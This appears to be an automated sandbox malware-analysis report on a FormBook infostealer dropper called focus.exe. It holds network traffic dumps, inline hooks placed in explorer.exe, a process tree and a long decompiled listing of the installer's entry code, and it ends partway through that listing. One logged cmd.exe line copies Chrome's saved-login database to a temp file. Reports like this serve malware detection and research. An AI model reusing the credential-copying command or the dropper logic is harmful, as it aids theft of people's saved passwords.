76 4b 61 52 74 50 6f 4b 66 6c 7a 6d 50 55 34 79 73 64 66 6e 4e 32 6f 38 6b 79 4f 59 64 55 36 32 46 62 6a 30 4c 6b 68 5f 43 4c 59 75 28 71 6d 70 38 57 52 4e 57 6c 6c 65 64 44 73 68 48 6a 68 67 62 4e 66 69 42 73 48 35 6c 55 47 4b 4c 49 37 6e 6c 36 35 4b 35 66 44 59 55 38 43 69 47 49 55 48 37 57 73 4c 43 41 53 58 39 62 75 30 34 65 45 78 78 63 28 4e 73 4d 5a 2d 5a 65 35 70 31 4a 47 51 56 53 38 31 46 61 75 61 66 76 6a 31 59 66 4d 4d 53 4d 47 45 41 41 35 42 45 43 61 6d 61 30 42 4e 56 79 59 6d 51 57 5a 43 6e 43 47 56 4f 5f 6f 66 73 2d 51 63 65 78 4b 56 68 76 39 79 77 6f 62 62 6e 44 33 74 50 55 42 4f 30 38 72 72 4d 5a 44 71 33 33 45 44 44 61 39 63 41 58 65 53 45 77 4b 77 49 32 62 41 47 30 43 66 4f 6c 75 69 34 78 68 5f 57 6e 71 52 79 61 70 4d 4b 4e 37 52 4a 4a 4b 32 59 70 34 52 35 51 4e 62 7e 39 69 6e 72 5f 52 32 77 78 75 35 69 65 56 59 74 46 4b 31 44 41 77 50 66 6b 32 44 67 34 6e 64 7e 35 56 73 4f 67 6a 6a 57 79 4c 41 44 30 31 71 6a 49 74 64 51 41 72 59 51 62 73 66 41 61 64 53 39 4d 6a 78 71 4d 50 47 30 71 7e 52 32 65 78 77 62 56 6e 6e 7e 4b 36 65 4d 70 61 32 62 74 6f 6a 59 71 77 68 28 4c 33 32 6f 61 48 49 52 51 72 31 7a 5a 31 55 38 52 62 6f 62 45 39 57 50 35 6b 31 6f 6b 78 67 43 4a 6d Data Ascii: BlP=zcVwKHUWotkdxL8MssVLu7hSz_SxpToEnlM3qasn0jIX8YkAh6lBwe1Xg3wx1T9_~7PQxpyoxYeCDq3Szo2v3d9STSwEKsZGwyR_77DxL0fsY4a4w85Fd8ukEB3ueCuU26QOhOjxTFh_iOJvbBM4iYHsghUv0stw5-o8vM19k7WcjpB54quqC8XuxhwmuLNix-sj80TnKwaSD1qfws(W2-t9zw3jMuNY676YRg9U4qxiNTGaLCEPKgq0aQvLKAVIwulHrTIMuaYIiJGwY8F7OI82rOa8wjbMv9O13C6z0MCA9HBB86OIYJHGlQ8rpBQyP_to8pXD7u8bQhctO6EOG2Alvz65JpqDgEg2TTatW6qI5Mfas8ix4eUaf8voSGnZr7VVOsieb-EHGGP0xAG5uFFzAvrXvpewzzTDdCw4cUczg11mYdVX6VtS06mU7uumPp70gCQbUnWGJs1Ar6BOpkxeyKPhZ5RPmk2MrmkCv-CuwnQ5nQirfHRRo3dJ2zANSRcecOZWFdUFTDCxzohrt-9tF3rv~w0GgrsvLDK9dOMOXxC4lPkUHV3CIlF5NI9hG4FQKg(WRLrq1N1p8QvTs81lNZL0sDTcsflU(pYO(mxBpvFzBes2kRe_4LLJXQdbikVOHI47UDGQU125Ic(tw_xS7goFIfUou05sySt5EjHo86h-aBaP5wlMwl415FuMu2IkC-YWApR11I5J3RbuKdSE3PYA769t1aEMXaWFVwvQBBDfn0UA(ke86kMpoom8vglCsaAUOPZampHEbytIokhIBFsLxvPmWZtHBxNyS4hAIWzWMp7SYzoHjyrza7BPbwc-J9vdO9ay2-w5SjM6i5aOXm0TCwmANCz9wOe-vid7xLgE803ZZJg2YK7SD5YJvCE5G-0quCdhY7ubnFrr8QMr55m1ITNsszDA5dMtu4R9BxvbquoYTmWca83aeR2GvKaRtPoKflzmPU4ysdfnN2o8kyOYdU62Fbj0Lkh_CLYu(qmp8WRNWlledDshHjhgbNfiBsH5lUGKLI7nl65K5fDYU8CiGIUH7WsLCASX9bu04eExxc(NsMZ-Ze5p1JGQVS81Fauafvj1YfMMSMGEAA5BECama0BNVyYmQWZCnCGVO_ofs-QcexKVhv9ywobbnD3tPUBO08rrMZDq33EDDa9cAXeSEwKwI2bAG0CfOlui4xh_WnqRyapMKN7RJJK2Yp4R5QNb~9inr_R2wxu5ieVYtFK1DAwPfk2Dg4nd~5VsOgjjWyLAD01qjItdQArYQbsfAadS9MjxqMPG0q~R2exwbVnn~K6eMpa2btojYqwh(L32oaHIRQr1zZ1U8RbobE9WP5k1okxgCJmIgJDPEiflHtB7Bp4rFbyxRv6oYZMtqHMr0sXjrdJFyGeWqNEzTGaUUicNU6(A1O6TgvA5xkyallY047ettNrdGeYHYtmrtaBGJdVWC8fSDobzkJVv(LpD(H8na3aH~x9P3RMbSfHkVPU38WsF44wLVPAXfFnsjwJoCOu88urlP0D3kEgUYsm3RKX_CyYXAwROpwvGUzurTznMaAs39m90z7WekaCZweawEkj0NlUT7ezRCk(AmFiFKLZUT-PI(BaFmansfJzWJODiRkByktortVDcjAKVgZoty3FMHdLlEVrqvb35VNRtu0G3wV9Hb3OJ55qYVV7t8oO1upWVBGVUMh3n7f11wCQXDs3aBqyYkQJAKSHBLCL0~_zuzMA3QKHNx-(RF86dI4XsUO2oESKZWcdP9IE8TrE2ZiNqKbWs6Y9w1u5_gKm02k6OsMHjNwC5Y1II7Eo3aZt8HidXFumT5K4zCFWRigtK9yCeZQRqlhzB98KlOytMPZ~3h3xG2xLZxYw21j8ms7Iw0ZKaRD6Oj4fFNS3nEX1mKL2aGU82Ki(xQ5h2mwizRMnK1cDnFhxAt0uBVlEZs0ctDueWgRThx2SyA5YljLBcLJP0KfiSifiKGivwi118xya8DM6L02aQmysEIqWhYFTuQ8ZCbkkGFCq6Im7CJO6NVIsej2wOdsxog_yJGJp815x_vots~T(pGM27W9HZJNCVlBYhg8zcM97VPDsO9aYqvLyTseltEbFW5vJoRxYBSe4eSY9rAvUNs3TrXLNHZ4KBty~pAYmLNm0L5IV6n0hUuGQuKd~FhrYw7JNdLfdUzKAIElGNkJ0_OQY42jCVmeI-MXU-mFeDpWNwimEAS47pA0wLxYY8kWJR2yKWyPUzdasoIjEPQhQ87AgP3_xhXalNNsrI4FEEZy7vV9JhEhYwECXvhNSk2bwEwGlzYBbXllKEOQW3gUxxbWNa6t~k9U7l3jT6RSvlOfqXeflHzxgh9V1ivtp9LwlmxIyIEmzIPW91EpkHMJT6pRRACzLWXktgzc5v6F1keDLUW2(5v_rysTnu1z0cMjiUKHkfYBg6PlnVDTsC0CkbK1qA1Vsww909N5ilRiIv80RHeqDAX6ymoeSgDJQFnDJuaRgK6aHuTtuyY2XOCN1AqNUCFtNKTKvQBvFlBW6Gvi73US2I~5XlvFkpBRTMB21tbh4Wi4tH2pLGhqxUf_h6MCKb3RKIKJKUwsw_VxochdIv(aqMF18PBayLI_rn0AVn0Pk4U0F2UndX8oTZIDEr2dY0MypLF_8eEh5r7cru9ZLD0XSFKlz2O3djXojj7cOEyAd5rKN6VFi-IR6V5QTul6XaLL6JVp(ApBtDRPQKvWpvvx4Xz5tCCrBDDXkPbQP1B0GxZbPJA1PLawAuyeNOEZ18LCEuSR1sGdcOff89d52JKa9DM9D4ifC2LGwoG8IJYusA1a7iNfExoe43JalJ8LrNCph5Ar56YQ82~JvDpVyoJQc6(aVl24W-k1mS3kai6sYiyDvWpFoLRd46eJ7IzM4n73z2ZqwVltHmB6AiLKZaEutjoqgBP7~8Nslm62yBW_4-PpXY0EzRnDOeRCXAF65c3QppTkSgQhhEWGpEczbDBkQghNpi5aYyReQSDmTmn1LGRbVf0ilI5X2i2ryO~6xvrjIXKbLir60jgpcw8QTfo1KYLu1nLm32qJ7nZ5xMwXwqvKmVu_ddvlBtNIfiz_(_lui1AHtQdzgHtNObqBiFKV2VJj38i1yIM5m9XzzIzxYMawTo6onEwfNLTWdBTnqE5xAtYAmayyFicjw7nJ66mSyS81pioS2NnZeFKEGMvkSzd-Gmu9o8fZlkWY6WOjVI6kLZV6tA7wGhEkOkF5NRQKnEx4lqAD8WR3z_6-TTH2W-hBd0BWSJyQScxmjFE6aUl83-xmNT15pYPfbSUpig1gbjEGCKiepn2ZuJO-BKcIEMqnE0V8CxRAoU30pVa2zwKwWnNhEOH-ow2mvqRyFWCwN1rv1IhHWYCSeuC8bv7UQ0DChzQ4Mj2fi7pEyL17dYlGDJZzZVWq5K7jIqurzVcLuSBG9JuY1Earwiw9qrGhMVxtlRmBPWAGz0wwdlKdtv~WEiI1QcPHggqNZaW7RRRk6HzQ2-NZ9kdPx-wQyigjF917Dz3h(t7Bh88kKeuk6_wLRptIa43vV7ckeUIM6DB5iiSU9w7FzpayizbK6itxDxz-lyADeNCmzLNQfV3IcmfsocGK0Qdz34SeKmalIQwrKvMLkh2mEIVGIcMaoVzp9D1jeXlQ(vZmVjEbuDxeiXvknDM6a2hV6bZE9oJnN9NkXSoX9NICr2Vf9D1lpVFQWvZvTvMfepnNiRrvs_Y282kLpE4gXPeZnFvyQpHzmZHuJYAP3_R3O_N04DS4rchXTivdWdhE5C4h(s6S7UU1i4k_FVoUzkTwc3c2(ACdh4vp58sFs_md7LpbhjhAk4GBXTKOHUQDVW6Zh_VGUp6uwheh3E5so72V1yc8zm53W39C5GsYE9S4nlpSb9sHRNmlZDBaq1V5jvBLK2SNV7s13UEFoXwU61CAvnpnPGdfRa0pA2kGOCyczYnGeO7STb20DeXneVC4TGTlpH(-3OGI120D4P5XLq6lUgy8DUkKdF3LBTEXXuDszGxgzxqCG9PvBZMiPMbK7lhkcArd3MDN8hlOCG6IJwSOnpByHJq9ONfJHrc4rWsg
May 12, 2021 23:55:58.349483013 CEST	4771	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.ordertds.com/vns/ Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 12 May 2021 21:55:58 GMT Connection: close Content-Length: 152 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 72 64 65 72 74 64 73 2e 63 6f 6d 2f 76 6e 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.ordertds.com/vns/">here</a></body>
May 12, 2021 23:55:58.349796057 CEST	4792	OUT	Data Raw: 61 71 34 59 5f 51 66 7e 6e 56 49 74 31 79 67 42 55 36 78 63 6d 33 48 75 38 64 79 57 57 44 30 53 36 48 63 63 4e 52 68 77 72 34 61 4f 78 55 4c 75 33 35 59 54 77 56 4c 74 42 74 74 4e 56 6c 58 57 43 6c 47 45 46 70 6e 68 43 58 38 34 68 79 69 78 75 65 Data Ascii: aq4Y_Qf~nVIt1ygBU6xcm3Hu8dyWWD0S6HccNRhwr4aOxULu35YTwVLtBttNVlXWClGEFpnhCX84hyixue4FXmRrh8R1nN2rF~xN9HwRQTNOMrZjojTngo8xb8C023zgSvrcHMzLQqVJCAG(JzOXJFlQd(ZIvpxlafJ2mxTCTRHE9nfjdfxGEeQcxlShlNSOhyAlmBiWQpjHFgmhEmQXw~xMb(nIUG3vAGIzH8C1ILycREI65x_

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE8
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE8
GetMessageW	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xE8
GetMessageA	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xE8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: focus.exe PID: 3176 Parent PID: 5600

General

Start time:	23:53:59
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\focus.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\focus.exe'
Imagebase:	0x400000
File size:	2844959 bytes
MD5 hash:	5E5CC661BEB832B718DF6B68D16C0165
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: player-toolkit.exe PID: 2588 Parent PID: 3176

General

Start time:	23:54:00
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Imagebase:	0x10000
File size:	1970176 bytes
MD5 hash:	1844A4E542EEAC121065EA23B0F1D6B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, Metadefender, Browse Detection: 69%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 2588

General

Start time:	23:55:02
Start date:	12/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: autochk.exe PID: 2428 Parent PID: 3388

General

Start time:	23:55:12
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autochk.exe
Imagebase:	0x1250000
File size:	871424 bytes
MD5 hash:	34236DB574405291498BCD13D20C42EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: wscript.exe PID: 1956 Parent PID: 3388

General

Start time:	23:55:13
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0xa30000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 404 Parent PID: 1956

General

Start time:	23:55:27
Start date:	12/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0xdd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5640 Parent PID: 404

General

Start time:	23:55:27
Start date:	12/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: player-toolkit.exe PID: 5216 Parent PID: 3388

General

Start time:	23:55:39
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Imagebase:	0x10000
File size:	1970176 bytes
MD5 hash:	1844A4E542EEAC121065EA23B0F1D6B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: player-toolkit.exe PID: 5452 Parent PID: 3388

General

Start time:	23:55:47
Start date:	12/05/2021
Path:	C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Imagebase:	0x10000
File size:	1970176 bytes
MD5 hash:	1844A4E542EEAC121065EA23B0F1D6B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: focus.exe PID: 3176 Parent PID: 5600 focus.exeCOMMON

Executed Functions

Function 00403348, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				char _t188;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t118 = E00406500(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E00406492(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t163 + 0x38, 0x160, 0); // executed
				E004060F7("Name Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t159 = "\"C:\\Users\\hardz\\Desktop\\focus.exe\" ";
				E004060F7(_t159, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t159;
				if("\"C:\\Users\\hardz\\Desktop\\focus.exe\" " == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t55;
				while(1) {
					_t121 =  *_t55;
					_t171 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t163 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7("C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly",  &(_t55[2]));
										L30:
										_t156 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156);
										_t59 = E00403317(_t171);
										_t172 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t174,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t184 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t62 =  *0x42f4ec;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E00406500(4);
													__eflags = _t66;
													if(_t66 == 0) {
														L65:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t163 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t152 = E00405ABA(_t159, 0);
											if(_t152 < _t159) {
												L39:
												_t181 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E0040577E(_t184);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\hardz\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\hardz\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t156);
														_t188 = "C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly"; // 0x43
														if(_t188 == 0) {
															E004060F7("C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly", _t161);
														}
														E004060F7(0x430000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\focus.exe", 0x429450, 1) != 0) {
																E00405ED6(_t136, 0x429450, 0);
																E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t93 = E00405796(0x429450);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405ED6(_t136, _t156, 0);
													}
													goto L43;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E00405B7D(_t181, _t152 + 4) == 0) {
													goto L43;
												}
												E004060F7("C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly", _t153);
												E004060F7("C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L42;
											}
											_t109 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E00403317(_t172);
										_t173 = _t112;
										if(_t112 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E00403317(_t173);
										_t174 = _t117;
										if(_t117 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t140 = _t55[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L23:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t141 = _t55[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L20;
							}
							goto L19;
						}
